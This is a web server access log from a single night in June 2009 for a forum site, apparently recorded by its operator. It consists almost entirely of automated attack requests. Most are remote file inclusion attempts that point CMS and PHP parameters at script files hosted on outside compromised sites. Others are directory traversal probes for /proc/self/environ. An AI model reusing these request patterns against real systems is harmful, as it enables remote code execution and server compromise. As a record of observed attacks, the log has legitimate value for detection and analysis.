60.43.229.5 - - [29/Jun/2009:02:43:31 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:43:58 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:43:58 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:43:58 -0700] "GET /logs/access_081208.log%20%20/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:44:30 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:44:30 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:44:30 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:44:34 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:44:34 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:44:34 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:46:49 -0700] "GET /logs/access.log%20%20/main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:46:49 -0700] "GET /logs/main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:46:49 -0700] "GET /logs/access.log%20%20/main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:46:49 -0700] "GET /main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:46:49 -0700] "GET /main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:46:49 -0700] "GET /logs/main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:02:49:05 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:02:49:05 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:02:49:05 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:02:49:35 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:02:49:35 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.191.11.195 - - [29/Jun/2009:02:49:38 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:02:49:38 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
89.191.11.195 - - [29/Jun/2009:02:49:38 -0700] "GET /errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "collegiateforum.org"
89.191.11.195 - - [29/Jun/2009:02:49:39 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
89.191.11.195 - - [29/Jun/2009:02:49:39 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
89.191.11.195 - - [29/Jun/2009:02:49:40 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "collegiateforum.org"
89.191.11.195 - - [29/Jun/2009:02:49:40 -0700] "GET /logs/errors.php?error=http://www.avunitas.nl/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "collegiateforum.org"
89.191.11.195 - - [29/Jun/2009:02:49:41 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
89.191.11.195 - - [29/Jun/2009:02:49:41 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:49:51 -0700] "GET /logs/access.log/main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:50:27 -0700] "GET /logs/access.log/main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:02:51:38 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:52:18 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:52:18 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:52:18 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:53:25 -0700] "GET /logs/access_090330.log/main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:02:54:33 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:54:42 -0700] "GET /logs/access.log/?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:54:42 -0700] "GET /?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:02:54:42 -0700] "GET /logs/?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:24 -0700] "GET /logs/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:24 -0700] "GET /logs/access.log/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:24 -0700] "GET /?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.0" 200 918 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:25 -0700] "GET /?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:25 -0700] "GET /logs/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.0" 200 5069 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:26 -0700] "GET /logs/access_090105.log%20%20/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:26 -0700] "GET /?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.0" 200 918 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:26 -0700] "GET /logs/access_090105.log%20%20/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:02:55:26 -0700] "GET /logs/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:55:43 -0700] "GET /logs/access_090330.log/main.php?pagina=http://www.cecilcap.org/smf/_a? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:02:57:01 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:03:00:21 -0700] "GET /logs/access_090105.log%20%20/?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:03:00:21 -0700] "GET /?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 934 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:03:00:21 -0700] "GET /logs/?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "www.collegiateforum.org"
86.39.131.85 - - [29/Jun/2009:03:04:00 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
86.39.131.85 - - [29/Jun/2009:03:04:00 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
86.39.131.85 - - [29/Jun/2009:03:04:00 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
207.210.89.18 - - [29/Jun/2009:03:06:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:03:06:22 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:03:06:22 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
199.120.90.222 - - [29/Jun/2009:03:06:24 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:06:34 -0700] "GET /logs/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:06:34 -0700] "GET /?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:06:37 -0700] "GET /logs/access_090330.log/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:08:05 -0700] "GET /logs/access_090330.log/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:08:05 -0700] "GET /?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:08:05 -0700] "GET /logs/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
86.39.131.85 - - [29/Jun/2009:03:09:02 -0700] "GET /logs/access_090330.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
209.151.224.247 - - [29/Jun/2009:03:10:18 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
209.151.224.247 - - [29/Jun/2009:03:10:18 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
209.151.224.247 - - [29/Jun/2009:03:10:18 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:10:21 -0700] "GET /logs/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 5085 "-" "libwww-perl/5.805" "www.collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:10:21 -0700] "GET /logs/access_081208.log/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
121.165.73.157 - - [29/Jun/2009:03:10:21 -0700] "GET /?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 934 "-" "libwww-perl/5.805" "www.collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:03:10:22 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:03:10:22 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
84.201.208.50 - - [29/Jun/2009:03:10:22 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
60.43.229.5 - - [29/Jun/2009:03:10:58 -0700] "GET /logs/access_090330.log/htmltonuke.php?filnavn=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
209.151.224.247 - - [29/Jun/2009:03:13:19 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
209.151.224.247 - - [29/Jun/2009:03:13:19 -0700] "GET /logs/access.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
209.151.224.247 - - [29/Jun/2009:03:13:19 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:03:18:59 -0700] "GET /logs/access_081208.log/?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:03:18:59 -0700] "GET /?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:03:18:59 -0700] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 5085 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:03:19:01 -0700] "GET /logs/access_081208.log/?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:03:19:01 -0700] "GET /?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 934 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:03:19:01 -0700] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 5085 "-" "libwww-perl/5.810" "www.collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:23:51 -0700] "GET /logs/access_090105.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:23:51 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:23:52 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:24:27 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:24:27 -0700] "GET /logs/access_090105.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:24:27 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:25:00 -0700] "GET /logs/access.log/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:25:00 -0700] "GET /errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
65.23.158.226 - - [29/Jun/2009:03:25:00 -0700] "GET /logs/errors.php?error=http://www.jv-deals.com//wordpress/wp-content/themes/AllBlue/AllBlue/images/thumb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "collegiateforum.org"
